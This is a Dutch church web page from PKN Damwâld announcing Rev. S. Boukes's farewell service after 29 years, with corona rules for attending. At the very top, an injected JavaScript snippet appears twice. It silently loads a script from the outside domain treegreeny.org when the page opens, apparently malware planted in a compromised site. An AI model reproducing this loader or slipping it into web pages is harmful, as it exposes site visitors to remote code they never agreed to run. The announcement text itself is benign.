;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ds. S. Boukes met emeritaat - PKN Damwâld

Ds. S. Boukes met emeritaat

Gepubliceerd op: donderdag 20 mei 2021

Zondag 30 mei is, na 29 jaar predikantschap in Damwoude, de afscheidsdienst van ds. Boukes.  Voordat hij naar Damwâld kwam was hij een aantal jaren predikant in Gees en in Giessendam-Neder-Hardinxveld. Door de nog steeds geldende corona maatregelen zal deze dienst helaas niet door iedereen bezocht kunnen worden. Na goed onderling overleg is er besloten dat zondag 30 mei een beperkt aantal Gereformeerde gemeenteleden zich kunnen opgeven voor deze dienst, via telefoonnummer: 06-1475 1932. Op vrijdagen zaterdagavond is dit nummer bereikbaar van 19.00 – 20.00 uur. Alle andere Gereformeerde en Hervormde gemeenteleden zijn natuurlijk van harte welkom deze dienst via de live stream te volgen!
Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden. Als u de kerk binnenkomt en verlaat, vragen wij u een eigen mondkapje te dragen. Als u op uw plek zit, kunt u deze afdoen. Meezingen is helaas nog niet toegestaan. Daarnaast is het belangrijk de 1,5 meter afstand te bewaren. Er is geen oppas en Bernetsjerke/KingKids aanwezig.

Heeft u klachten of bent u in contact geweest met iemand die corona-klachten heeft, blijf dan thuis. Bij binnenkomst kunt u de handen ontsmetten met het aanwezige ontsmettingsapparaat. De garderobe kan niet worden gebruikt, u dient de jas mee naar binnen nemen, daar is genoeg ruimte. De toiletten mogen niet gebruikt worden en deze zijn dan ook afgesloten.